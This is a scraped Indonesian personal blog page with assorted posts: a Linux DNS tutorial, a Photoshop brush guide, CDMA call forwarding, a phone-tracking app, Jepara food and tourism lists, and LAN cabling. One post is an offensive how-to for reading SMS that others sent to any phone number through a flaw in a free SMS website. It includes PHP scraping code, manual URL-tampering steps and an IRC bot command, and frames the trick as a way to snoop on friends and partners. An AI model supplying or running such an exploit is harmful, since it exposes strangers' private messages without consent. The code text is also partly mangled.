Slide 1 Title Here

Your Description Here..................................

Slide 2 Title Here

Your Description Here..................................

Slide 3 Title Here

Your Description Here..................................

Slide 4 Title Here

Your Description Here..................................

Slide 5 Title Here

Your Description Here..................................

Cara Mengganti DNS Pada setingan modem dengan wvdial di Linux mint

16.10 |



Saat ini ada 2 Layanan DNS Gratis yang paling banyak digunakan oleh pengguna internet diseluruh dunia yaitu Google Public DNS dan OpenDNS. Kedua layanan tersebut dapat anda jadikan sebagai alternatif jika DNS yang anda gunakan sekarang sedang bermasalah. Namun tidak tertutup kemungkinan bahwa kedua layanan tersebut lebih baik daripada DNS yang anda gunakan sekarang ini. Tujuan mengganti DNS adalah agar membuka halaman web lebih cepat dan aman. Bukan mendownlaod suatu file lebih cepat. Jika ingin tahu lebih dalam tentang DNS khususnya DNS Google Public DNS miliknya google silakan baca” disini
Untuk anda yang belum tahu bagaimana caranya untuk mengganti DNS, dibawah ini saya akan memberikan sebuah cara mengganti DNS pada setingan modem dengan dialer wvdial kepada para pengguna linux. Disini saya menggunakan modem CDMA Venus VT-21 dengan kartu flexy dan dialer WVDIAL. langsung saja inilah langkah”nya :
1. Buka terminal dan ketikkan :
2. gksudo gedit /etc/ppp/peers/wvdial
3. Beri tanda # pada kata usepeerdns sehingga menjadi #usepeerdns kemudian save n exit
lihat gambar dibawah!

Misalkan disitu tidak ada silakan dibuat sendiri.
4. sudo gedit /etc/wvdial.conf
5. Tambahkan baris berikut di wvdial anda : Auto DNS = off kemudian save n exit
6. gksudo gedit /etc/resolv.conf
ubah baris berikut :
nameserver 208.67.222.222
nameserver 208.67.220.220
dengan Google Public DNS sehingga menjadi :
nameserver 8.8.8.8
nameserver 8.8.4.4
Jangan lupa save n exit
Lihat gambar!

Selesailah sudah, tinggal coba modem anda dengan wvdial dan rasakan bedanya saat membuka halaman web ;)
Read More

Otw Dataran Tinggi Dieng

16.02 |






Read More

Teman - Teman Di Jogya

16.00 |








Read More

Kelulusan SMK

15.57 |





Read More

Teman & Masa SMKku Dulu

15.53 |

Read More

Membuat Brush Bubble (gelembung Sabun) dengan Adobe Photoshop

17.29 |

Udah lama gak posting tutorial photoshop nih .. maklum aja, kesibukan merajalela :p .. sekarang mumpung sempet bikin tutorial photoshop, yaa saya bikin aja daripada waktu nya abis gak puguh.. tul gak.. tul gak ?
Banyak permintaan tentang cara membuat brush ke email.. ya udah sekarang saya buatin photoshop tutorial nya.. agak panjang sih.. tapi gak terlalu susah kok.. nanti temen-temen bisa kreasiin lagi , saya percaya temen-temen orang kreatif semua, mungkin jadinya malah lebih bagus nanti..
Oia .. Besok Final Piala AFF.. jangan lupa tetep dukung TIM Sepak Bola Indonesia kita tercinta.. kalah menang biasa.. yang penting harus Sportif,  ya gak ? mendingan menang tapi sportif daripada kalah tapi tidak sportif… ya iya lah … :P
jangan sampe menang dipuja kalah dicerca.. yang penting tetep dukung aja .. moga-moga kelak bisa sampe piala dunia.. terus ngalahin Argentina, Spanyol, Belanda, jadi Juara Dunia deh…. aminnnnnnnnnnnnnnnnnnn…. ngimpi nya keterlaluan banget ini mah…. biarinn  !! yang ngimpi kan sayah..hehehe.
Lanjut ke tutorial membuat brush bubble nya
Kita buat dokumen yang agak gede biar brush na nanti rada bagus gambarnya :)
warnai dokumen baru dengan warna hitam dengan brush tool
Buat layer baru.. klik Layer > new > layer
buat lingkaran dengan elliptical Marquee tool , drag sambil klik tombol SHIFT biar lingkaran nya bener-bener bulet..
Klik Edit > Stroke .. beri warna abu-abu agak gelap atau
Klik Select > Save Selection
untuk menyimpan lingkaran tadi biar nanti bisa di load dengan besar dan tempat yang sama..
Klik Channel palette.. sebelahnya layer palette..  terus klik Alpha 1
Read More

Cara Menyelipkan Kartu GSM ke Hanphpne CDMA

16.57 |



knologi HandPhone CDMA dan GSM terkadang membuat orang bingung harus memilih yang mana, di satu sisi, CDMA dikenal karena biaya operasional yang lebih murah, namun disisi lain GSM punya keunggulan jangkauan yang lebih luas.

Trik ini sebenarnya sudah lama, tapi mungkin hanya sedikit yang tahu dan biasanya paling cuma orang-orang counter HP saja. Tapi karena trik ini sebenarnya bukanlah suatu rahasia besar (TOP SECRET) yang hanya orang tertentu saja yang boleh tahu, maka aq akan mengungkapkannya disini.

Manfaat yang bisa didapatkan dengan menyisipkan nomor CDMA ke nomor GSM antara lain:
HP GSM akan memiliki 2 nomor sekaligus dalam satu Handphone.
HP anda akan dapat dihubungi secara lokal bahkan lewat telepon koin pun bisa.
Nomor CDMA lokal anda masih dapat dihubungi sekalipun berada diluar daerah.
Nggak perlu beli HP CDMA untuk menggunakan nomor CDMA.
Tapi ini bukannya tanpa kelemahan maupun keterbatasan :
Nomor CDMA lokal anda hanya dapat digunakan untuk menerima telepon saja, sedangkan fungsi untuk menelpon, mengirim dan menerima SMS tetap ditangani oleh nomor GSM.
Bagaimanapun juga pulsa nomor CDMA tetap harus diisi sekalipun tidak digunakan, karena nomor CDMA bisa tidak berfungsi kalau pulsa hangus atau kosong.
Dikenakan biaya airtime yang dipotong langsung dari pulsa CDMAnya walaupun cuma terima telepon saja.
Tapi paling nggak Trik ini bisa dimanfaatin bagi anda yang sibuk dan harus mobile ke luar daerah, ataupun untuk tetap keep in touch pada saat pulang kampung ataupun liburan.

Yang harus disiapkan yaitu:
HP GSM dan nomor GSM tentunya untuk ditambahkan nomor CDMA.
HP CDMA sebaiknya dengan Fasilitas Ruim Dual Band yang menggunakan kartu dan bukan yang di injek) seperti : Nokia 2115, 6015, 6016, 6585, dll. Dan nggak perlu beli, karena cuma dipakai sebentar aja, bisa pinjem sama saudara, temen, tetangga ataupun tempat dimana beli nomor CDMA nya.
Kartu Perdana CDMA, pilih yang sesuai untuk di sisipkan ke nomor GSM anda.
Star One untuk : Mentari, IM3, dan Matrix
Flexy untuk : Simpati, Kartu AS, Kartu Hallo
Esia untuk : Simpati, Kartu AS, Kartu Hallo dan XL
Pemilihan kartu harus benar-benar sesuai, jika tidak maka trik ini nggak akan berhasil.

Cara Menyisipkannya:
Masukkan kartu perdana CDMA yang telah dibeli kedalam HP CDMA .
Lakukan Pengaktifan
1. Untuk Star One :
Tekan *92 + Nomor HP anda (No. HP GSM yang ingin disisipi) misalnya: *92081512345678
Tekan OK/Yes.. lalu dengarkan
Setelah selesai tutup HP CDMA nya
Di test dengan menelpon ke No. CDMA, jika yang berdering adalah HP GSM berarti anda telah berhasil !!
2. Untuk Flexy :
Tekan *71 + Nomor HP anda (No. HP GSM yang ingin disisipi) misalnya: *7108125712345
Tekan OK/Yes dan dengarkan...
Setelah selesai tutup HP CDMA nya
Di test dengan menelpon ke No.CDMA, jika HP GSM anda berdering, maka anda telah berhasil !!
3. Untuk Esia :
Tekan *12 + Nomor HP anda (No. HP GSM yang ingin disisipi) misalnya: *12081612345678
Tekan OK/Yes dan dengarkan...
Setelah selesai tutuh HP CDMA nya
Di test kembali dengan menelpon ke No.CDMA, jika HP GSM anda yang berdering, maka anda telah berhasil !!
Nggak sulit kan, kurang lebih seperti mengisikan pulsa dari voucher yang kita beli saja.

Suatu saat mungkin kita ingin mengembalikan nomor CDMA kedalam kartu asalnya agar bisa digunakan di HP CDMA, berikut cara-cara untuk mengembalikannya.
1. Untuk Star One
Tekan *920
Tekan OK/Yes dan dengarkan...
Setelah selesai tutup
Di test dengan menelpon ke nomor CDMA, jika HP CDMA berdering, maka nomor telah kembali ke kartu asalnya.
2. Untuk Flexy
Tekan *710
Tekan OK/Yes dan dengarkan...
Setelah selesai tutup
Di test dengan menelpon ke nomor CDMA, jika HP CDMA berdering, maka nomor telah kembali ke kartu asalnya.
3. Untuk Esia
Tekan *120
Tekan OK/Yes dan dengarkan...
Setelah selesai tutup
Di test dengan menelpon ke nomor CDMA, jika HP CDMA berdering, maka nomor telah kembali ke kartu asalnya.

Selamat Mencoba ..........
Read More

Cara Melacak Hp Yang Hilang

16.52 |


Program Software Pelacak Handphone ( HP ) Yang Hilang

Semakin berkembangnya zaman teknologi akhir-akhir ini, sangat membantu kehidupan kita sebagai manusia entah itu yang bersifat langsung maupun tak langsung. Disini kami akan membahas mengenai program aplikasi software yang bisa untuk melacak keberadaan handphone kita, entah karena hilang tercuri maling maupun karena lupa saat kita menaruh hp kita.

Program aplikasi yang bisa melacak hp hilang mulai banyak yang diinstalkan di handphone cina. Di hp symbian juga sudah ada beberapa macam program sejenis. Namun, aplikasi untuk hp java yang populasinya paling besar, seperti sony ericcson, nokia dll malah belum tersedia. kini ada aplikasi mGuard berbasis java untuk hp sony ericcson, yaitu mGuard.

Program ini akan mencatat nomor IMEI dari hp yg di instalasi, begitu hp hilang dan simcard di ganti,maka aplikasi otomatis akan mengirim sms ke dua nomor yang telah Ditentukan sebelum nya. Pencuri tidak bisa mematikan atau mengubah setting didalamnya karena mGuard di lindungi oleh password.

sebelum bisa di gunakan mGuard harus didaftarkan nomor IMEI-nya ke website mGuard di dexmobile.com. Cara ini sekaligus untuk memastikan hanya si pemilik hp yang bisa membuka aplikasi yg telah di password. Hp yg sama jg hanya bisa didaftarkan SEKALI karena no IMEI-nya telah tercatat di server mGuard.

Cara Menginstal program aplikasi software mGuard langkah demi langkah yaitu :

1. masuk ke website Http://www.dexmobile.com/mguard_se.aspx

lalu register. masukan nama, alamat email, nomor IMEI hp yg bisa di ketahui lwt tombol *#06# , dan negara, lalu pilih "send unlock code,jk nmr IMEI yg di masukin lebih dari 17 digit, maka berati aplikasi tidak mendukung ponsel anda.

2. cek alamat email yg telah di daftarkan, maka anda akan mendapat unlock code terdiri dari 8 digit.

3. aktifkan mGuard1.1, dan masukan unlock code, yg tlah di dapat dari email yang didaftarkan, lalu kick 'next'.

4. Lanjutkan dengan mengisikan nomor hp anda sendiri, lalu "next".

5.pilih "yes" saat muncul pesan untk mengirim pesan sms, dan tunggu hingga proses verifikasi selesai.

6. masukan nomor ke dua, misalnya nomor teman atau keluarga anda, lalu klick "next".

7. anda akan dibawa ke menu untuk mengisi teks "sim card of your friend has been changing.please don't delete this message".

8. pilih "OKE" di tombol navigasi dan ganti teks yg akan di munculkan. misalnya dengan isi teks "sim card hp di ganti".

9. lalu buat password sehingga hanya anda sendiri yg mengetahuinya. lalu "next" dan masukan kembali password yg sama.

10. pilìh durasi pendeteksian dari perubahan sim card, sesuai kebutuhan. bisa setiap saat hp di hidupkan (every bootup) atau sehari sekali (daily once).

11. periksa lagi status mGuard aktif, no hp teman/soudara sudah benar, dan isi teks yang akan terkirim otomatis saat sim card di ganti, durasi deteksi Penggantian sim card, nomor hp sendiri dan password.

12. maka, setiap kali hp di hidupkan & sim card di ganti, selalu akan muncul pesan untuk mengirimkan sms ke nomor yang telah ditentukan. Meskipun di pilih "no" pesan kan selalu muncul.

13. aplikasi otomatis akan mengirim pesan ke nomor yg anda miliki dengan isi "mobile restarted".

14. aplikasi otomatis juga mengirimkan 1 pesan sms lagi ke nomor teman/saudara yang telah di tentukan, dengan isi pesan yang telah di buat & nomor IMEI hp nya.

Semoga Berhasil...:)

Read More

Oleh - oleh Khas Jepara

16.45 |


Makanan

Makanan Khas Jepara:
  • Pindang Srani
  • Rondo Royal (Monyos) = tape goreng yang dibungkus tepung.
  • Klenyem (Lempok) = ketela parut goreng isi gula merah.
  • Kenyol (Gantilut) = ketela parut dibungkus daun pisang dan tengahnya diisi gula merah, cara masak dikukus.
  • Nogosari = tepung dibungkus daun pisang dan tengahnya diisi buah pisang masak, cara masak dikukus.
  • Moto Belong = ketela parut dibungkus daun pisang dan tengahnya diisi buah pisang masak, cara masak dikukus, dan disajikan dengan cara dipotong-potong agak miring menyerupai bola mata dan dimakan dengan kelapa yang diparut dicampur sedikit gula.
  • Poci = tepung dari ketan yang dibungkus daun pisang dan dibentuk kerucut diisi campuran kelapa parut dan gula merah.
  • Kuluban = urap-urap dengan nangka muda, kacang panjang dan daun mudanya, tauge mentah, dan buah petai, disajikan mentahan.
  • Pecel Ikan Laut Panggang = ikan laut bakar dengan bumbu sambal santan kelapa.
  • Horok-horok* = makanan yang sangat langka dan hanya ditemukan di jepara ini dibuat dengan bahan baku sagu. dengan cara pembuatan yang cukup aneh yaitu menggunakan sisir rambut. bentuknya seperti busa sterofom yang kenyal dengan rasa sedikit asin. biasanya dimakan sebagai campuran bakso,gado-gado, ataupun lainnya.
  • Horok-Horok Janganan = Horok-horok* di beri sayur-sayuran seperti: Daun Bayam, Toge, Kacang Panjang, bong (bambu muda), dll, lalu di beri sambal.
  • Horok-Horok Cecek = Horok-horok* yang dimakan dengan lauk cecek (Seperti Sate Kulit)
  • Bontosan = adonan krupuk ikan tenggiri dalam bentuk gelondongan dan sudah dikukus.
  • Sate Udang dan Sate Kerbau
  • Terasi Jepara
  • Kacang Oven
  • Kacang Jepara = Kacang tanah yang masih ada kulitnya alias belum di kupas kulitnya, di sangrai dengan pasir putih sampai warna kulit kacang menjadi kehitaman.
  • Durian Petruk (Durio Zybethinus Kultivar Petruk)
  • Jeruk Jepara (Limnocitrus Littoralis (miq) Swingle)
  • Gereh Iwak Teri = Ikan teri yang dijadikan semacam ikan asin, kebanyakan dari pulau karimunjawa.
  • Latuh/Lato = sejenis rumput laut, enak dimakan dalam keadaan segar, dan konon bisa menyembuhkan radang tenggorok, amandel.
  • Tempong (blenyik) = ikan teri mentah yang dikeringkan, bentuknya seperti bakwan.
  • Sutet = Susu Telor Tegangan Tinggi


Minuman

Minuman khas Jepara:
  • Adon-adon Coro = minuman jahe santan dengan irisan kelapa bakar, yang disajikan hangat.
  • Es Gempol = minuman santan dan gempol (bola dari tepung beras), biasa disajikan manis, asin, hangat ataupun dingin.
  • Es Pleret = minuman santan dan pleret (tepung beras yang dimakan sedikit kenyal) hampir mirip dengan gempol.
  • Dawet Jepara (Es Cendhol / Cendol) = terbuat dari bahan-bahan tepung sagu, gula merah asli, santan kelapa.
Read More

Tempat Wisata di Jepara

16.42 |



Wisata Alam

  • Pulau Karimunjawa dan gugusannya
  • Pulau Panjang
  • Pulau Mandalika, di Ujungwatu
  • Pantai Kartini, di Bulu
  • Pantai Tirto Samodra, di Bandengan
  • Pantai Empu Rancak, di Karanggondang
  • Pantai Pungkruk, di Mororejo
  • Pantai Guamanik Pecatu, di Ujungwatu
  • Pantai Teluk Awur, di Telukawur
  • Pantai Semat, di Semat
  • Pantai Bondo, di Bondo
  • Cagar Alam Gunung Clering, di Clering
  • Air Terjun Songgo Langit, di Bucu
  • Mbelik (Mata Air) Bidadari dan Jaka Tarub, di Daren
  • Telaga Sejuta Akar, di Bondo
  • Gua Tritip, di Ujungwatu
  • Gua Manik, di Sumanding
  • Wono Pinus Sentra, di Batealit
  • Wisata Alam Sreni Indah, di Bategede


Wisata Sejarah

  • Benteng Portugis, di Ujungwatu
  • Benteng VOC, di Ujungbatu
  • Musium R.A Kartini, di Panggang
  • Tempat Plasenta (Ari-ari) R.A Kartini, di Pelemkerep
  • Masjid Mantingan, di Mantingan
  • Gapura Masjid Jami' Baiturrohman I, di Robayan
  • Candi Angin, di Tarung


Wisata Religi (Ziarah)

  • Cirosomo (Makam Para Adipati/Bupati yang pernah memimpin Jepara dan keluarga besar R.A Kartini), di Sendang
  • Makam Sultan Hadirin dan Ratu Kalinyamat serta Raden Abdul Jalil (Sunan Jepara), di Mantingan
  • Makam Syeh Siti Jenar, di Kelet
  • Makam Habib Sodiq (Yek Nde), di Kriyan
  • Makam Mbah Roboyo, di Robayan
  • Makam Datuk Gunardi, di Singaraja
  • Makam Habib Ali, di Mayong
  • Makam Ronggo Kusumo, di Manyargading
  • Makam Syeh Abu Bakar, di Pulau Panjang
  • Makam Pangeran Syarif dan Mbah Jenggolo, di Saripan
  • Makam Ki Gede, di Bangsri
  • Makam Syeh Amir Hasan (Sunan Nyamplungan), di Karimunjawa


Wisata Keluarga

  • Tiara Park Waterboom and 3D Theater, di Purwogondo
  • Alamoya Waterboom, di Bapangan
  • Kolam Renang Sinta Pool, di Pecangaan Kulon
  • Agrowisata Jeruk, di Bategede


Wisata Belanja

  • Pasar Kerajinan, di Margoyoso
  • Pasar Apung, di Demaan
  • Pasar Karangrandu (Pasar Jajan khas Jepara), di Karangrandu
  • Pasar Ngabul, di Ngabul
  • Pasar Lelang Mebel, di Rengging
  • Shopping Center Jepara (S.C.J), di Panggang
  • Kalau ingin kasur anda hangat + nyaman beli " Kapuk " asli bukan campuran di tempak Bpk. Sayuti , Alamat Ds.Suwawal Barat Rt 02/02,Kec :Mlonggo,Yang Terbaik hanya di tempat Bpk.Sayuti bukan yang lainnya.

Read More

Mengintip SMS yang dikirim dari www.sms-online.web

16.42 |



Just info, www.sms-online.web.id merupakan situs yang menyediakan fasilitas untuk mengirim SMS gratis ke nomor GSM maupun CDMA.

yarp, setelah sebelumnya kita memanfaatkan situs www.sms-online.web.id sebagai SMS Gateway untuk mengirimkan sms lewat bot, sekarang mari kita lihat SMS apa aja yang dikirim oleh orang lain ke nomor HP teman kita melalui situs tersebut.

Setelah kita mengirim SMS dari situs tersebut, sebuah pesan akan muncul :

"Simpan alamat ini, alamat ini dapat digunakan untuk melihat inbox (sms masuk dari 085256593315 ), untuk hari seterusnya
http://www.sms-online.web.id/sms/sms.html?d=inbox&f=inbox.gammu.list&Phonenumbers=M Dg1MjU2NTkzMzE1"

Lalu terdapat juga link ke alamat berikut ini:
http://www.sms-online.web.id/sms/sms...g1MjU2NTkzMzE1

Melihat alamat ini, terlihat sebuah kode yang telah dienkripsi menggunakan encode base64, yakni kode "MDg1MjU2NTkzMzE1", setelah di decrypt, kode tersebut ternyata adalah nomor 085256593315 yang merupakan nomor tujuan SMS. Lalu bagaimana kalo kita iseng mengganti nomor tersebut dengan nomor HP teman kita? yarp, jika sudah ada yang pernah mengirim SMS ke nomor HP teman kita, maka pesan tersebut bisa kita baca. 

let's coding it.. 
Kode Programnya:
<?php
    
function getSMS($hp,$content){
        
$url "http://www.sms-online.web.id/sms/sms.html?d=".$content."&f=".$content.".list&Phonenumbers=".base64_encode($hp);
        
$ch curl_init();
        
curl_setopt($ch,CURLOPT_URL,$url);
        
curl_setopt($ch,CURLOPT_RETURNTRANSFERtrue);           
        
$getSource curl_exec($ch);       
        
curl_close($ch);
        
$f1 explode("STATUS",$getSource,2);
        
$f2 explode(base64_decode("Z29vZ2xlX2FkX2NsaWVudA=="),$f1[1]);
        
$f3 explode(htmlspecialchars("</td>"),htmlspecialchars($f2[0]));
        
$a=1;
        for(
$i=1;$i<(count($f3)/7)+1;$i++){
            echo 
"Pesan ke-".$i."<br>";
            echo 
"Waktu: ".str_replace(htmlspecialchars("&lt;td &gt;"),"",htmlspecialchars($f3[2+(6*($i-1))]))." -- ".$i."<br>";
            echo 
"Nomor: ".str_replace(htmlspecialchars("&lt;td &gt;"),"",htmlspecialchars($f3[4+(6*($i-1))]))." -- ".$i."<br>";
            echo 
"Pesan: ".str_replace(htmlspecialchars("&lt;td align=&quot;left&quot; class=&quot;td_left&quot; &gt;"),"",htmlspecialchars($f3
[5+(6*($i-1))]))." -- ".$i."<br>";
            
$a++;
        }
    }
   
    echo 
"<form name='f' method='post' action=''>
            Masukkan No. HP : <input type='text' name='hp'><input type='submit' name='submit'>
          </form>"
;
    if(isset(
$_POST['submit'])){
        
$hp $_POST['hp'];
        
$content "sentitems";
        
getSMS($hp,$content);
    }
?>
Dengan code diatas, kita tinggal memasukkan nomor HP tujuan yang ingin kita lihat semua SMS yang telah dikirim ke nomor tersebut.

[Romeo] : Wah, berarti SMS cinta-cinta yang aku kirim ke Juliet bisa dibaca semua orang dong?
[K4pT3N] : iya..
[Juliet] : Romeo say, kamu ngirim sms cinta-cinta apa ke nomorku? kok gak masuk? aku udah ganti nomor. belum tau ya say? Eh, K4pT3N, trus kalo aku gak ngerti programming, gimana caranya biar bisa lihat SMS yang dikirim Romeo padaku? kan aku udah ganti nomor?
[K4pT3N] : Gini...
liat ja alamat ini:
http://www.sms-online.web.id/sms/sms...g1MjU2NTkzMzE1

code setelah Phonenumbers itu ganti ja dengan nomor HP nya Romeo, trus enkripsi pake encode Base64. GUnakan situs ini untuk mengenkripsi:
http://tools.explorecrew.org/enc-dec.php
Misalnya, nomor HP nya Romeo adalah 08124463435, gunakan situs tersebut untuk enkripsi sehingga akan didapat kode MDgxMjQ0NjM1MzY= lalu ganti alamat diatas menjadi:
http://www.sms-online.web.id/sms/sms...gxMjQ0NjM1MzY=

[Juliet] : Oh gitu ya.. thx ya.. ok deh say Romeo, aku cek SMS yang kamu kirim ke nomor lamaku ya?

// End Of Story

Buat yang gak pengen coding ataupun mengenkripsi dulu untuk melihat SMS dengan cara diatas, silahkan maen ke IRC server @byroe di chan #jmozac #byroe #conf , udah aku buatin bot-nya, gunakan perintah:
.yarp sent No_HP

Semoga bermanfaat ^_^

[Juliet] : hei Romeo, siapa tuh Dina? kok kamu ngirim SMS cinta-cinta juga ke dia? kita putus...!!!
[Romeo] : itu temenku say...
[Juliet] : temen kok pake cinta-cinta? kita putus..!!!!!!!

[K4pT3N] : hehe, wah, gak ikut2an deh kalo ada masalah kek gini... 

// End Of Story (lagi)
yarp yarp.
Read More

Instalasi dan Konfigurasi Jaringan LAN dengan Kabel UTP

16.37 |



LAN (Local Area Network) merupakan jernis jaringan yang menghubungkan dua atau lebih workstation dalam satu jaringan local yg tidak terlalu luas, misalx dalam satu ruang atau satu gedung. Secara garis besar terdapat dua tipe jaringan LAN, yaitu :
1. Peer to Peer
2. Client-Server
Jaringan peer-to-peer merupakan jenis jaringan yang menghubungkan beberapa workstation dimana setiap workstation mempunyai kedudukan yg sama. dalam artian masing2 WS berbagi sumberdaya. Sedangkan, jaringan Client-Server, dapat dilihat dari namax, dimana terdapat WS yg berfungsi sebagai server yg menyediakan sumber daya yg diberikan kepada tiap2 client.

ok. kita langsung saja.
1. Instalasi jaringan LAN

beberapa hal yg diperlukan dalam instalasi ini seperti:

- Kabel UTP
- konektor RJ-45
- Tang Crimping
- Lan Tester (optional)
- LAN Card (NIC) buat mainboard yg offboard (perangkat network dan grapich belum disertakan/eksternal)

setelah yg dibutuhkan sdah siap, maka kita dpat memulai membangun jaringan yang kita butuhkan.
perlu diperhatikan juga bahwa tiap jenis jaringan akan menggunakan tipe kabel yang berbeda.

[+] jaringan peer-to-peer menggunakan kabel tipe Crossover
[+] jaringan client-server menggunakan kabel tipe Straight

langsung saja kita memulai membuat kabel jaringan yg pertama yaitu jaringan peer-to-peer
pada jaringan ini kita menggunakan kabel tipe Crossover. berikut merupakan susunan warna kabel pada tipe Crossover.

konektor 1#
PH - H - PO - B - PB - O - PC - C

konektor 2#
PO - O - PH - B - PB - H - PC - C



seadangkan untuk jaringan yg kedua yaitu jaringan Client-Srver kita menggunakan kabel Straight, yg dimana susunan warna kabelx sprti brikut:

konektor 1# dan 2# susunanx sama

PO - O - PH - B - PB - H - PC - C





ket:
H > hijau
B > biru
O > orange
C > coklat
P > putih

setelah kita selesai menyusun warna kabel sesuai yang kita butuhkan, kita lanjutkan dengan menghubungkanx dengan konekstor RJ-45. ratakan ujung2 kedelapan kabel yang akan kta masukkan kedalam konektor.
yg perlu diperhatikan saat memasukkan kabel2 kedalam konekstor yaitu posisi konektor menghadap keatas ato kebawah, jangan sampai terbalik posisix pada konektor ujung yg satu dan pada ujung lainnya.
setelah itu kunci konektor dan kabel dengan menggunakan tang crimping. jika perlu anda bisa
mengetes kabel anda dengan LAN Tester. Pastikan setiap lampu yang hidup pada LAN tester sama.

nah tahap instalasi sudah selesai. sekarang kita lanjutkan pada tahap selanjutnya.


2. Konfigurasi jaringan LAN

saya akan coba memberikan langkah2 yg lebih singkat dalam melakukan konfigurasi jaringan ini.
bebrapa hal yang perlu diprhatikan juga agar nantinya tidak terjadi conflict dalam network yg kita buat yaitu:

a. Computer Name dan Workgroup
b. IP Address


a.) untuk mengatur nama dan workgorup, kita dapat melakukanx dengan langkah sperti brikut:
klik kanan My Computer pilih Properties. masuk pada tabulasi Computer name.

klik tombol Change. masukkan nama komputer dan workgroup lalu tekan OK.


b.) untuk mengatur IP address kita dapat melakukanx dengan langkah sperti brikut:
klik Start > Control Panel > Netwotk and Internet Connection > Network Connection.
pilih NIC yang sedang aktif. klik kanan dan pilih Properties.

pada tabulasi General dalam kotak Connection pilih Internet Connection (TCP/IP) lalu klik properties (bisa juga dengan double klik).

pilih Use the Following IP Address.

Isikan dengan alamat yg akan digunakan, misalx :

IP Address : 192.168.1.10
Subnet mask : 255.255.255.0
Default Gateway : 192.168.1.1 (ip media yg kita gunakan sbagai gateway mislx modem ADSL)

untuk DNS biarkan sj kosong.
klik OK.

sekarang coba anda melakukan browsing dengan web browser ato melakukan ping ke www.google.commelalui command prompt.

jika masih belum terkoneksi internet, coba perhatikan kabel yg dipasang atau pastikan pada modem sudah benar konfigurasix alias statusx sudah UP.


semoga bermanfaat.
Read More

Inilah Aku ...

16.32 |

Inilah aku .....

Otw Malioboro

Otw Benteng deket malioboro

Otw Paris (Parang Tritis)

 Otw Gunung Merapi

Otw Jogja Dinihari

Otw Dataran Tinggi Dieng

Read More